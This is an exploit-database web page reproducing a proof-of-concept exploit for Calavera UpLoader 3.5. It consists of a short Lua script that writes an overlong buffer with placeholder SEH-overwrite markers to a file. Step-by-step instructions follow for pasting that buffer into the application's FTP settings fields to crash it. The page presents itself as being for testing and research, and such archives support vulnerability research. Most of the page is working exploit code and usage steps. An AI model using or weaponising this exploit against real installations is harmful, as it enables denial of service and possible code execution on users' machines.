Advertisement






Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)

CVE Category Price Severity
N/A CWE-264 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2021-01-04
CPE
cpe:cpe:/a:calavera:uploader:3.5.039
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010024

Below is a copy:

Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
-- Title : Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite).
-- Courtesy of Rmulo, @uromulou - Date : 04/01/2021.

-- PoC < Proof of Concept:
--
-- 1 -> Run the lua script, to create file "poc.dat"...
-- 2 -> Copy the content of the new file "poc.dat" to clipboard...
-- 3 -> Open the application...
-- 4 -> Click on "Settings"...
-- 5 -> Paste contents of the generated file into the parameters "FTP Address", "Username and Password". Furthermore, check the box with the statement "Check to save password in preferences"...
-- 6 -> Down...
--


print("-> Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)")
print("-> This exploit was written by Rmulo, @uromulou.")

local buffer = string.rep("A", 477) .. "BBBB" .. "CCCC" .. string.rep("\xff", 2000)

file = io.open("poc.dat", "w")
file:write(buffer)
file:close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum